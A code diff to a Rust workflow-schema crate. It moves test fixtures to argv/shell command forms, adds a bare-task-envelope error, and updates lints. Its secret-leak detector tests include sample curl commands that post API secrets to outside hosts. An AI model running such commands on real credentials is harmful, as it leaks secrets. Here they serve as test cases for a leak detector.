-            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: extract\n    infer:\n      prompt: \"extract\"\n      max_tokens: 100\n      schema:\n        type: object\n        properties:\n          summary: {{ type: string }}\n          tags:\n            type: array\n            items:\n              type: object\n              properties:\n                name: {{ type: string }}\n        required: [summary]\n  - id: use_it\n    depends_on: [extract]\n    exec: {{ command: \"echo {consumer_expr}\" }}\n"
+            "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: extract\n    infer:\n      prompt: \"extract\"\n      max_tokens: 100\n      schema:\n        type: object\n        properties:\n          summary: {{ type: string }}\n          tags:\n            type: array\n            items:\n              type: object\n              properties:\n                name: {{ type: string }}\n        required: [summary]\n  - id: use_it\n    depends_on: [extract]\n    exec: {{ shell: \"echo {consumer_expr}\" }}\n"
         )
     }
 
@@ -473,13 +473,13 @@ mod tests {
 
     #[test]
     fn unshaped_task_is_opaque() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"date\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output.whatever }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"date\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"${{ tasks.a.output.whatever }}\"] }\n";
         assert!(findings_of(yaml).is_empty(), "no schema → no claim");
     }
 
     #[test]
     fn explicitly_open_schema_is_opaque() {
-        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        type: object\n        additionalProperties: true\n        properties:\n          known: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output.unknown_key }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        type: object\n        additionalProperties: true\n        properties:\n          known: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"${{ tasks.a.output.unknown_key }}\"] }\n";
         assert!(findings_of(yaml).is_empty(), "explicit opt-out honored");
     }
 
@@ -491,7 +491,7 @@ mod tests {
         // unknown key must NOT be flagged. This pins the
         // `Some(Value::Object(_)) => true` arm of `is_open_object`, which
         // the Bool-form test above does not exercise.
-        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        type: object\n        additionalProperties: { type: string }\n        properties:\n          known: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output.unknown_key }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        type: object\n        additionalProperties: { type: string }\n        properties:\n          known: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"${{ tasks.a.output.unknown_key }}\"] }\n";
         assert!(
             findings_of(yaml).is_empty(),
             "a value-schema additionalProperties opens the object → no finding"
@@ -500,7 +500,7 @@ mod tests {
         // Control: with additionalProperties ABSENT, the same unknown key
         // IS flagged — proving the open-object arm is what suppresses it
         // (so deleting that arm becomes observable as a spurious finding).
-        let closed = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        type: object\n        properties:\n          known: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output.unknown_key }}\" }\n";
+        let closed = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        type: object\n        properties:\n          known: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"${{ tasks.a.output.unknown_key }}\"] }\n";
         let f = findings_of(closed);
         assert_eq!(f.len(), 1, "closed object flags the unknown key");
         assert!(f[0].detail.contains("known"), "lists the real key");
@@ -508,7 +508,7 @@ mod tests {
 
     #[test]
     fn output_bindings_rebind_the_address_space() {
-        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"cat data.json\" }\n    output:\n      first: \". | .[0]\"\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output.first }} ${{ tasks.a.output.frist }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"cat\", \"data.json\"] }\n    output:\n      first: \". | .[0]\"\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"${{ tasks.a.output.first }}\", \"${{ tasks.a.output.frist }}\"] }\n";
         let f = findings_of(yaml);
         assert_eq!(f.len(), 1, "first ok, frist flagged");
         assert!(f[0].detail.contains("first"), "lists bindings");
@@ -534,7 +534,7 @@ mod tests {
 
     #[test]
     fn any_of_admits_when_one_branch_matches() {
-        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        anyOf:\n          - type: object\n            properties:\n              left: { type: string }\n          - type: object\n            properties:\n              right: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output.left }} ${{ tasks.a.output.neither }}\" }\n";
+        let yaml = "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\ntasks:\n  - id: a\n    infer:\n      prompt: \"x\"\n      max_tokens: 10\n      schema:\n        anyOf:\n          - type: object\n            properties:\n              left: { type: string }\n          - type: object\n            properties:\n              right: { type: string }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"${{ tasks.a.output.left }}\", \"${{ tasks.a.output.neither }}\"] }\n";
         let f = findings_of(yaml);
         assert_eq!(f.len(), 1, "left admits, neither fails all branches");
         assert!(f[0].reference.ends_with("neither"));

--- a/crates/nika-schema/src/check/secrets.rs
+++ b/crates/nika-schema/src/check/secrets.rs
@@ -154,7 +154,7 @@ secrets:
     #[test]
     fn secret_into_exec_command_leaks() {
         let yaml = format!(
-            "nika: v1\nworkflow: leak\n{SECRETS}tasks:\n  - id: t\n    exec: {{ command: \"curl -H 'Auth: ${{{{ secrets.api_key }}}}' x\" }}\n"
+            "nika: v1\nworkflow: leak\n{SECRETS}tasks:\n  - id: t\n    exec: {{ shell: \"curl -H 'Auth: ${{{{ secrets.api_key }}}}' x\" }}\n"
         );
         let l = leaks_of(&yaml);
         assert_eq!(l.len(), 1);
@@ -165,7 +165,7 @@ secrets:
     #[test]
     fn secret_into_exec_env_leaks() {
         let yaml = format!(
-            "nika: v1\nworkflow: leak\n{SECRETS}tasks:\n  - id: t\n    exec:\n      command: \"printenv\"\n      env:\n        TOKEN: \"${{{{ secrets.api_key }}}}\"\n"
+            "nika: v1\nworkflow: leak\n{SECRETS}tasks:\n  - id: t\n    exec:\n      command: [\"printenv\"]\n      env:\n        TOKEN: \"${{{{ secrets.api_key }}}}\"\n"
         );
         let l = leaks_of(&yaml);
         assert_eq!(l.len(), 1);
@@ -218,7 +218,7 @@ secrets:
     #[test]
     fn no_secrets_declared_no_scan() {
         let yaml =
-            "nika: v1\nworkflow: none\ntasks:\n  - id: t\n    exec: { command: \"echo hi\" }\n";
+            "nika: v1\nworkflow: none\ntasks:\n  - id: t\n    exec: { command: [\"echo\", \"hi\"] }\n";
         assert!(leaks_of(yaml).is_empty());
     }
 
@@ -226,7 +226,7 @@ secrets:
     fn with_aliased_secret_now_leaks_with_a_trace() {
         // The review's false negative — fixed by the IFC engine.
         let yaml = format!(
-            "nika: v1\nworkflow: w\n{SECRETS}tasks:\n  - id: t\n    with: {{ tok: \"${{{{ secrets.api_key }}}}\" }}\n    exec: {{ command: \"curl -H ${{{{ with.tok }}}}\" }}\n"
+            "nika: v1\nworkflow: w\n{SECRETS}tasks:\n  - id: t\n    with: {{ tok: \"${{{{ secrets.api_key }}}}\" }}\n    exec: {{ shell: \"curl -H ${{{{ with.tok }}}}\" }}\n"
         );
         let l = leaks_of(&yaml);
         assert_eq!(l.len(), 1);
@@ -236,7 +236,7 @@ secrets:
     #[test]
     fn secret_into_on_finally_cleanup_leaks() {
         let yaml = format!(
-            "nika: v1\nworkflow: w\n{SECRETS}tasks:\n  - id: t\n    exec: {{ command: \"echo build\" }}\n    on_finally:\n      - invoke: {{ tool: \"nika:write\", args: {{ path: \"x\", content: \"${{{{ secrets.api_key }}}}\" }} }}\n"
+            "nika: v1\nworkflow: w\n{SECRETS}tasks:\n  - id: t\n    exec: {{ command: [\"echo\", \"build\"] }}\n    on_finally:\n      - invoke: {{ tool: \"nika:write\", args: {{ path: \"x\", content: \"${{{{ secrets.api_key }}}}\" }} }}\n"
         );
         let l = leaks_of(&yaml);
         assert_eq!(l.len(), 1, "the cleanup leak is reported");
@@ -247,7 +247,7 @@ secrets:
     #[test]
     fn secret_egress_into_outputs_is_reported() {
         let yaml = format!(
-            "nika: v1\nworkflow: w\n{SECRETS}tasks:\n  - id: a\n    exec: {{ command: \"echo ${{{{ secrets.api_key }}}}\" }}\noutputs:\n  leaked: ${{{{ tasks.a.output }}}}\n"
+            "nika: v1\nworkflow: w\n{SECRETS}tasks:\n  - id: a\n    exec: {{ shell: \"echo ${{{{ secrets.api_key }}}}\" }}\noutputs:\n  leaked: ${{{{ tasks.a.output }}}}\n"
         );
         let e = egresses_of(&yaml);
         assert_eq!(e.len(), 1);
@@ -259,7 +259,7 @@ secrets:
     fn literal_prose_mentioning_secret_is_not_a_leak() {
         // No ${{ }} island → no reference → no leak (the prose false positive).
         let yaml = format!(
-            "nika: v1\nworkflow: w\n{SECRETS}tasks:\n  - id: t\n    exec: {{ command: \"echo 'set secrets.api_key in vault'\" }}\n"
+            "nika: v1\nworkflow: w\n{SECRETS}tasks:\n  - id: t\n    exec: {{ command: [\"echo\", \"'set\", \"secrets.api_key\", \"in\", \"vault'\"] }}\n"
         );
         assert!(
             leaks_of(&yaml).is_empty(),
@@ -456,7 +456,7 @@ secrets:
         host: \"api.x.com\"
 tasks:
   - id: t
-    exec: { command: \"curl -d ${{ secrets.k }} https://api.x.com\" }
+    exec: { command: [\"curl\", \"-d\", \"${{ secrets.k }}\", \"https://api.x.com\"] }
 ";
         let l = leaks_of(yaml);
         assert_eq!(l.len(), 1, "fetch clearance never authorizes exec");
@@ -599,7 +599,7 @@ secrets:
         host_from_self: true
 tasks:
   - id: t
-    exec: { command: \"echo done\" }
+    exec: { command: [\"echo\", \"done\"] }
     on_finally:
       - invoke:
           tool: \"nika:notify\"
@@ -630,12 +630,12 @@ secrets:
     key: RAW
 tasks:
   - id: t
-    exec: { command: \"echo done\" }
+    exec: { command: [\"echo\", \"done\"] }
     on_finally:
       - invoke:
           tool: \"nika:notify\"
           args: { channel: webhook, target: \"${{ secrets.hook }}\", message: \"ok\" }
-      - exec: { command: \"curl -d ${{ secrets.raw }} https://x.com\" }
+      - exec: { command: [\"curl\", \"-d\", \"${{ secrets.raw }}\", \"https://x.com\"] }
 ";
         let l = leaks_of(yaml);
         assert!(

--- a/crates/nika-schema/src/check/tools.rs
+++ b/crates/nika-schema/src/check/tools.rs
@@ -320,7 +320,7 @@ mod tests {
     #[test]
     fn on_finally_cleanup_tools_are_checked() {
         let f = findings_of(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"true\" }\n    on_finally:\n      - invoke: { tool: \"nika:wrte\", args: { path: \"x\", content: \"y\" } }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: [\"true\"] }\n    on_finally:\n      - invoke: { tool: \"nika:wrte\", args: { path: \"x\", content: \"y\" } }\n",
         );
         assert_eq!(f.len(), 1);
         assert_eq!(f[0].task, "t (on_finally)");
@@ -456,7 +456,7 @@ mod tests {
     #[test]
     fn on_finally_invoke_args_are_checked() {
         let f = arg_findings_of(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"true\" }\n    on_finally:\n      - invoke: { tool: \"nika:write\", args: { path: \"x\", content: \"y\", appnd: true } }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: [\"true\"] }\n    on_finally:\n      - invoke: { tool: \"nika:write\", args: { path: \"x\", content: \"y\", appnd: true } }\n",
         );
         assert_eq!(f.len(), 1);
         assert_eq!(f[0].task, "t (on_finally)");
@@ -549,7 +549,7 @@ mod tests {
     #[test]
     fn missing_required_in_on_finally_is_checked() {
         let f = missing_of(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"true\" }\n    on_finally:\n      - invoke: { tool: \"nika:hash\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: [\"true\"] }\n    on_finally:\n      - invoke: { tool: \"nika:hash\" }\n",
         );
         assert_eq!(f.len(), 1);
         assert_eq!(f[0].task, "t (on_finally)");

--- a/crates/nika-schema/src/error.rs
+++ b/crates/nika-schema/src/error.rs
@@ -443,6 +443,27 @@ pub enum SchemaError {
         /// Source span.
         span: Option<Span>,
     },
+
+    /// A bare `${{ tasks.<id> }}` — the ENVELOPE, not a value (spec
+    /// `04-variables.md` §namespaces · 0.103 · #75 D2).
+    ///
+    /// The projection set is CLOSED (`.output` · `.status` · `.error` ·
+    /// `.duration_ms` + declared bindings); unprojected record access is
+    /// ill-typed. Before 0.103 the bare form silently denoted the whole
+    /// envelope — the golden-drift class engine#524 taught around,
+    /// killed at the root.
+    #[error(
+        "bare `tasks.{task}` is the envelope, not a value — pick `.output` \
+         (or .status/.error/.duration_ms · 04 §namespaces · closed projection set)"
+    )]
+    BareTaskEnvelope {
+        /// The referenced task.
+        task: String,
+        /// Where the reference sits (`when:` · `prompt:` · `outputs.<n>` …).
+        location: String,
+        /// Source span.
+        span: Option<Span>,
+    },
 }
 
 impl SchemaError {
@@ -508,7 +529,8 @@ impl SchemaError {
             | Self::UnresolvedNamespaceRef { span, .. }
             | Self::LoopLocalOutsideForEach { span, .. }
             | Self::UnknownTaskField { span, .. }
-            | Self::OutputPathProvablyInvalid { span, .. } => *span,
+            | Self::OutputPathProvablyInvalid { span, .. }
+            | Self::BareTaskEnvelope { span, .. } => *span,
             Self::Cycle { .. } => None,
         }
     }
@@ -576,6 +598,7 @@ schema_code!(SCHEMA_307, 307, "output-path-provably-invalid");
 schema_code!(SCHEMA_308, 308, "recover-await-deadlock");
 schema_code!(SCHEMA_309, 309, "bad-builtin-args");
 schema_code!(SCHEMA_310, 310, "expression-violation");
+schema_code!(SCHEMA_311, 311, "bare-task-envelope");
 
 impl NikaErrorCode for SchemaError {
     fn nika_code(&self) -> NikaCode {
@@ -611,6 +634,7 @@ impl NikaErrorCode for SchemaError {
             Self::LoopLocalOutsideForEach { .. } => SCHEMA_305,
             Self::UnknownTaskField { .. } => SCHEMA_306,
             Self::OutputPathProvablyInvalid { .. } => SCHEMA_307,
+            Self::BareTaskEnvelope { .. } => SCHEMA_311,
         }
     }
 
@@ -773,6 +797,11 @@ fn analysis_level_variants() -> Vec<SchemaError> {
             task: String::new(),
             path: String::new(),
             reason: String::new(),
+            span: None,
+        },
+        SchemaError::BareTaskEnvelope {
+            task: String::new(),
+            location: String::new(),
             span: None,
         },
     ]

--- a/crates/nika-schema/src/error/spec_code.rs
+++ b/crates/nika-schema/src/error/spec_code.rs
@@ -219,6 +219,10 @@ impl SchemaError {
             // binding validation · fixture variables/012) · the
             // category table's « invalid path » class.
             Self::OutputPathProvablyInvalid { .. } => var(3, VariableError),
+            // NIKA-VAR-020 · bare `tasks.X` is the envelope, not a value
+            // (04 §namespaces · 0.103 · #75 D2 · spec fixture
+            // variables/020 matches on namespace + validation_error).
+            Self::BareTaskEnvelope { .. } => var(20, ValidationError),
         }
     }
 }
@@ -387,11 +391,11 @@ mod tests {
             // variants (the spec defines ONE code for the class).
             seen.insert((code.namespace, code.num, code.category.as_str()));
         }
-        // 30 variants · 3 share VAR-001 · 2 share VAR-005 → 27
+        // 31 variants · 3 share VAR-001 · 2 share VAR-005 → 28
         // distinct codes (DAG-004 + BadBuiltinArgs generic + the
-        // registry remaps of 2026-06-11 · the nika:done arm adds
-        // BUILTIN-DONE-001 only when the tool matches — the enumerator
-        // carries the generic arm).
-        assert_eq!(seen.len(), 27, "{seen:?}");
+        // registry remaps of 2026-06-11 · VAR-020 bare-envelope joins
+        // 0.103 · the nika:done arm adds BUILTIN-DONE-001 only when the
+        // tool matches — the enumerator carries the generic arm).
+        assert_eq!(seen.len(), 28, "{seen:?}");
     }
 }

--- a/crates/nika-schema/src/lints/arg_injection.rs
+++ b/crates/nika-schema/src/lints/arg_injection.rs
@@ -456,7 +456,7 @@ vars:
 tasks:
   - id: connect
     exec:
-      command: \"ssh ${{ vars.host }} uptime\"
+      shell: \"ssh ${{ vars.host }} uptime\"
 ";
         assert!(
             lints_of(yaml).is_empty(),

--- a/crates/nika-schema/src/lints/native_first.rs
+++ b/crates/nika-schema/src/lints/native_first.rs
@@ -70,7 +70,7 @@ mod tests {
     #[test]
     fn mirrors_the_spec_lints_fixtures() {
         let fired = lints_of(
-            "nika: v1\nworkflow: curl-crawl\ntasks:\n  - id: crawl\n    exec: { command: \"curl -s https://example.com -o out/site.html\" }\n",
+            "nika: v1\nworkflow: curl-crawl\ntasks:\n  - id: crawl\n    exec: { command: [\"curl\", \"-s\", \"https://example.com\", \"-o\", \"out/site.html\"] }\n",
         );
         assert_eq!(
             fired,
@@ -86,7 +86,7 @@ mod tests {
         );
 
         let silent = lints_of(
-            "nika: v1\nworkflow: build\ntasks:\n  - id: test\n    exec: { command: \"cargo test --workspace --lib\" }\n  - id: nested\n    depends_on: [test]\n    exec: { command: \"nika run subroutine.nika.yaml\" }\n",
+            "nika: v1\nworkflow: build\ntasks:\n  - id: test\n    exec: { command: [\"cargo\", \"test\", \"--workspace\", \"--lib\"] }\n  - id: nested\n    depends_on: [test]\n    exec: { command: [\"nika\", \"run\", \"subroutine.nika.yaml\"] }\n",
         );
         assert!(silent.is_empty(), "{silent:?}");
     }

--- a/crates/nika-schema/src/lints/preference_rules/mod.rs
+++ b/crates/nika-schema/src/lints/preference_rules/mod.rs
@@ -627,11 +627,18 @@ fn rule_006_per_element_timing(tasks: &[&RawTask], lints: &mut Vec<Lint>) {
         let RawAction::Exec(e) = &task.action else {
             continue;
         };
-        let Some(c) = e.command.shell_str() else {
-            continue; // argv form: no shell timeout wrapper
+        // Both forms wear the wrapper: `shell: "timeout 30 …"` and
+        // `command: ["gtimeout", "30", …]` (0.103: argv is the default
+        // spelling — the D1 migration exposed the shell_str-only blind
+        // spot).
+        let head_is_timeout = match e.command.shell_str() {
+            Some(c) => {
+                let c = c.trim_start();
+                c.starts_with("timeout ") || c.starts_with("gtimeout ")
+            }
+            None => matches!(e.command.argv_program(), Some("timeout" | "gtimeout")),
         };
-        let c = c.trim_start();
-        if !(c.starts_with("timeout ") || c.starts_with("gtimeout ")) {
+        if !head_is_timeout {
             continue;
         }
         lints.push(Lint::new(
@@ -714,13 +721,21 @@ fn is_shard_chain(tasks: &[&RawTask], chain: &[usize]) -> bool {
     let actions: Vec<&RawAction> = chain.iter().map(|&i| &tasks[i].action).collect();
     match actions[0] {
         RawAction::Exec(_) => {
+            // Tokens: argv elements verbatim (0.103's default spelling — the
+            // D1 migration exposed the shell_str-only blind spot), else the
+            // whitespace-split shell line.
             let tokens: Vec<Vec<&str>> = actions
                 .iter()
                 .filter_map(|a| {
                     if let RawAction::Exec(e) = a {
-                        e.command
-                            .shell_str()
-                            .map(|c| c.split_whitespace().collect())
+                        match &e.command {
+                            crate::raw::RawCommand::Argv(parts) => {
+                                Some(parts.iter().map(|p| p.value.as_str()).collect())
+                            }
+                            crate::raw::RawCommand::Shell(c) => {
+                                Some(c.value.split_whitespace().collect())
+                            }
+                        }
                     } else {
                         None
                     }

--- a/crates/nika-schema/src/lints/preference_rules/tests.rs
+++ b/crates/nika-schema/src/lints/preference_rules/tests.rs
@@ -49,10 +49,10 @@ nika: v1
 workflow: interp
 tasks:
   - id: produce
-    exec: { command: \"./gen.sh\" }
+    exec: { command: [\"./gen.sh\"] }
   - id: consume
     depends_on: [produce]
-    exec: { command: \"process ${{ tasks.produce.output }}\" }
+    exec: { shell: \"process ${{ tasks.produce.output }}\" }
 ";
     let eight = lints_for(yaml, "one-obvious-way/008");
     assert_eq!(eight.len(), 1, "exactly one /008 must fire");
@@ -71,7 +71,7 @@ nika: v1
 workflow: plain
 tasks:
   - id: build
-    exec: { command: \"cargo build\" }
+    exec: { command: [\"cargo\", \"build\"] }
 ";
     assert!(
         lints_for(yaml, "one-obvious-way/008").is_empty(),
@@ -89,10 +89,10 @@ nika: v1
 workflow: pipe
 tasks:
   - id: produce
-    exec: { command: \"./gen.sh\" }
+    exec: { command: [\"./gen.sh\"] }
   - id: consume
     depends_on: [produce]
-    exec: { command: \"cat ${{ tasks.produce.output }} | wc -l\" }
+    exec: { shell: \"cat ${{ tasks.produce.output }} | wc -l\" }
 ";
     assert!(
         lints_for(yaml, "one-obvious-way/008").is_empty(),
@@ -176,11 +176,11 @@ nika: v1
 workflow: redundant
 tasks:
   - id: a
-    exec: { command: \"./a.sh\" }
+    exec: { command: [\"./a.sh\"] }
   - id: b
     depends_on: [a]
     when: \"${{ tasks.a.status == 'success' }}\"
-    exec: { command: \"./b.sh\" }
+    exec: { command: [\"./b.sh\"] }
 ";
     let one = lints_for(yaml, "one-obvious-way/001");
     assert_eq!(one.len(), 1, "the redundant success `when:` must fire /001");
@@ -400,10 +400,10 @@ workflow: skipdep
 tasks:
   - id: a
     on_error: { skip: true }
-    exec: { command: \"./a.sh\" }
+    exec: { command: [\"./a.sh\"] }
   - id: b
     depends_on: [a]
-    exec: { command: \"./b.sh\" }
+    exec: { command: [\"./b.sh\"] }
 ";
     let two = lints_for(yaml, "one-obvious-way/002");
     assert_eq!(
@@ -427,11 +427,11 @@ workflow: guarded
 tasks:
   - id: a
     on_error: { skip: true }
-    exec: { command: \"./a.sh\" }
+    exec: { command: [\"./a.sh\"] }
   - id: b
     depends_on: [a]
     when: \"${{ tasks.a.status in ['success', 'failure'] }}\"
-    exec: { command: \"./b.sh\" }
+    exec: { command: [\"./b.sh\"] }
 ";
     assert!(
         lints_for(yaml, "one-obvious-way/002").is_empty(),
@@ -454,11 +454,11 @@ nika: v1
 workflow: dup
 tasks:
   - id: build
-    exec: { command: \"./build.sh\" }
+    exec: { command: [\"./build.sh\"] }
   - id: rebuild
     depends_on: [build]
     when: \"${{ tasks.build.status == 'failure' }}\"
-    exec: { command: \"./build.sh\" }
+    exec: { command: [\"./build.sh\"] }
 ";
     let three = lints_for(yaml, "one-obvious-way/003");
     assert_eq!(
@@ -829,7 +829,7 @@ nika: v1
 workflow: succguard
 tasks:
   - id: a
-    exec: { command: \"echo hi\" }
+    exec: { command: [\"echo\", \"hi\"] }
   - id: b
     depends_on: [a]
     when: \"${{ tasks.a.status == 'success' }}\"
@@ -864,13 +864,13 @@ nika: v1
 workflow: f005
 tasks:
   - id: a
-    exec: { command: \"./a.sh\" }
+    exec: { command: [\"./a.sh\"] }
   - id: b
-    exec: { command: \"./b.sh\" }
+    exec: { command: [\"./b.sh\"] }
   - id: cleanup
     depends_on: [a, b]
     when: \"${{ tasks.a.status in ['success', 'failure'] }}\"
-    exec: { command: \"./cleanup.sh\" }
+    exec: { command: [\"./cleanup.sh\"] }
 ";
     let five = lints_for(yaml, "one-obvious-way/005");
     assert_eq!(five.len(), 1, "the terminal cleanup fires /005");
@@ -888,11 +888,11 @@ nika: v1
 workflow: f005two
 tasks:
   - id: a
-    exec: { command: \"./a.sh\" }
+    exec: { command: [\"./a.sh\"] }
   - id: b
     depends_on: [a]
     when: \"${{ tasks.a.status != 'success' }}\"
-    exec: { command: \"./b.sh\" }
+    exec: { command: [\"./b.sh\"] }
 ";
     assert!(
         lints_for(yaml, "one-obvious-way/005").is_empty(),
@@ -910,13 +910,13 @@ nika: v1
 workflow: f005partial
 tasks:
   - id: a
-    exec: { command: \"./a.sh\" }
+    exec: { command: [\"./a.sh\"] }
   - id: b
-    exec: { command: \"./b.sh\" }
+    exec: { command: [\"./b.sh\"] }
   - id: c
     depends_on: [a]
     when: \"${{ tasks.a.status in ['success', 'failure'] }}\"
-    exec: { command: \"./c.sh\" }
+    exec: { command: [\"./c.sh\"] }
 ";
     assert!(
         lints_for(yaml, "one-obvious-way/005").is_empty(),
@@ -941,7 +941,7 @@ workflow: f006
 tasks:
   - id: shards
     for_each: [1, 2, 3]
-    exec: { command: \"timeout 30 ./process.sh\" }
+    exec: { command: [\"timeout\", \"30\", \"./process.sh\"] }
 ";
     let six = lints_for(yaml, "one-obvious-way/006");
     assert_eq!(six.len(), 1, "the per-element timeout wrapper fires /006");
@@ -958,7 +958,7 @@ workflow: f006g
 tasks:
   - id: shards
     for_each: [1, 2, 3]
-    exec: { command: \"gtimeout 30 ./process.sh\" }
+    exec: { command: [\"gtimeout\", \"30\", \"./process.sh\"] }
 ";
     let six = lints_for(yaml, "one-obvious-way/006");
     assert_eq!(six.len(), 1, "the gtimeout wrapper fires /006");
@@ -976,7 +976,7 @@ tasks:
   - id: shards
     for_each: [1, 2, 3]
     timeout: 30s
-    exec: { command: \"./process.sh\" }
+    exec: { command: [\"./process.sh\"] }
 ";
     assert!(
         lints_for(yaml, "one-obvious-way/006").is_empty(),
@@ -1001,13 +1001,13 @@ nika: v1
 workflow: f007
 tasks:
   - id: shard1
-    exec: { command: \"./process.sh part1\" }
+    exec: { command: [\"./process.sh\", \"part1\"] }
   - id: shard2
     depends_on: [shard1]
-    exec: { command: \"./process.sh part2\" }
+    exec: { command: [\"./process.sh\", \"part2\"] }
   - id: shard3
     depends_on: [shard2]
-    exec: { command: \"./process.sh part3\" }
+    exec: { command: [\"./process.sh\", \"part3\"] }
 ";
     let seven = lints_for(yaml, "one-obvious-way/007");
     assert_eq!(seven.len(), 1, "the 3-shard chain fires /007 on the head");
@@ -1048,10 +1048,10 @@ nika: v1
 workflow: f007two
 tasks:
   - id: shard1
-    exec: { command: \"./process.sh part1\" }
+    exec: { command: [\"./process.sh\", \"part1\"] }
   - id: shard2
     depends_on: [shard1]
-    exec: { command: \"./process.sh part2\" }
+    exec: { command: [\"./process.sh\", \"part2\"] }
 ";
     assert!(
         lints_for(yaml, "one-obvious-way/007").is_empty(),
@@ -1068,13 +1068,13 @@ nika: v1
 workflow: f007pipe
 tasks:
   - id: fetch
-    exec: { command: \"./fetch.sh\" }
+    exec: { command: [\"./fetch.sh\"] }
   - id: parse
     depends_on: [fetch]
-    exec: { command: \"./parse.sh --strict input.json\" }
+    exec: { command: [\"./parse.sh\", \"--strict\", \"input.json\"] }
   - id: report
     depends_on: [parse]
-    exec: { command: \"./report.sh\" }
+    exec: { command: [\"./report.sh\"] }
 ";
     assert!(
         lints_for(yaml, "one-obvious-way/007").is_empty(),

--- a/crates/nika-schema/src/parser/envelope.rs
+++ b/crates/nika-schema/src/parser/envelope.rs
@@ -998,7 +998,7 @@ nika: v1
 workflow: demo
 tasks:
   - id: t
-    exec: { command: \"true\" }
+    exec: { command: [\"true\"] }
 ";
 
     #[test]

--- a/crates/nika-schema/src/parser/mod.rs
+++ b/crates/nika-schema/src/parser/mod.rs
@@ -616,7 +616,7 @@ tasks:
         use std::fmt::Write as _;
         let mut yaml = String::from("nika: v1\nworkflow: w\ntasks:\n");
         for i in 0..=tasks::MAX_TASKS {
-            let _ = write!(yaml, "  - id: t{i}\n    exec: {{ command: \"true\" }}\n");
+            let _ = write!(yaml, "  - id: t{i}\n    exec: {{ command: [\"true\"] }}\n");
         }
         let err = parse_strict(&yaml).expect_err("rejected");
         assert!(err.to_string().contains("resource bound"), "{err}");
@@ -827,7 +827,7 @@ tasks:
     #[test]
     fn bare_modeline_parse_failure_names_the_cause() {
         let yaml = "$schema=https://nika.sh/schema/v1/workflow.schema.json\n\
-                    nika: v1\nworkflow: hello\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n";
+                    nika: v1\nworkflow: hello\ntasks:\n  - id: a\n    exec: { command: [\"true\"] }\n";
         let err = parse_strict(yaml).expect_err("bare modeline breaks the doc");
         let SchemaError::YamlSyntax { message, span } = err else {
             panic!("expected YamlSyntax, got {err:?}");
@@ -850,7 +850,7 @@ tasks:
     fn bare_language_server_line_is_the_same_class() {
         let yaml = "# SPDX-License-Identifier: Apache-2.0\n\
                     yaml-language-server: $schema=https://nika.sh/x.json\n\
-                    nika: v1\nworkflow: hello\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n";
+                    nika: v1\nworkflow: hello\ntasks:\n  - id: a\n    exec: { command: [\"true\"] }\n";
         let err = parse_strict(yaml).expect_err("unknown top-level field in strict");
         let SchemaError::UnknownField {
             field, suggestion, ..
@@ -870,7 +870,7 @@ tasks:
     fn commented_modeline_never_fires_the_lint() {
         // The HEALTHY form — parse succeeds, the lint is never consulted.
         let yaml = "# yaml-language-server: $schema=https://nika.sh/x.json\n\
-                    nika: v1\nworkflow: hello\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n";
+                    nika: v1\nworkflow: hello\ntasks:\n  - id: a\n    exec: { command: [\"true\"] }\n";
         parse_strict(yaml).expect("commented modeline is valid YAML");
     }
 

--- a/crates/nika-schema/src/parser/tasks.rs
